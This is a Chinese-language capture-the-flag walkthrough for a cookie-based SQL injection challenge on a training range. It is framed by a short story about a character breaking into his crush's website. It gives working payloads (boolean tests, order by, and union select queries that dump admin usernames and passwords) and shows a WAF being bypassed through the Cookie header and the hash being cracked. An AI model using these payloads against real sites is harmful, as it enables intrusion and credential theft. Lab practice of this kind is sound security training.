尤里在得到女神家網站密碼后,卻發現注入點權限很小,憑他的皮毛技術也沒找到網站后台,
這是尤里通過旁站查詢,他發現了女神家網站是用的主機空間托管,
他立刻掃描旁站,果然發現一個站點,且后台是默認路徑……
尤里冷笑一聲行動了起來,這時有一層防火牆攔在了他的面前。。
靶場地址
https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb
請求方式 GET
閉合方式
注入方式 Cookie
注入代碼
測試
?id=169 正常訪問 ?id=171 正常訪問
可以看出id值是跟數據庫有交互的。
?id=169' 頁面限制---WAF
經過研究發現,cookie可能存在注入點
插件是火狐的ModHeader插件,通過插件擴展搜索直接安裝,這里就不分享了。
輸入id=171',發現有報錯,這里存在報錯注入。
由於Cookie是放在HTTP中通過URL進行傳輸的,空格的URL編碼
id=171+and+1=1 頁面正常
id=171+and+1=2 頁面報錯
跟第一章一樣,采用order by確定字段數量
order by 10頁面顯示正常(記得把空格換成+)
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
id=12345+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
使用https://cmd5.com/幫助解密
密碼為 welcome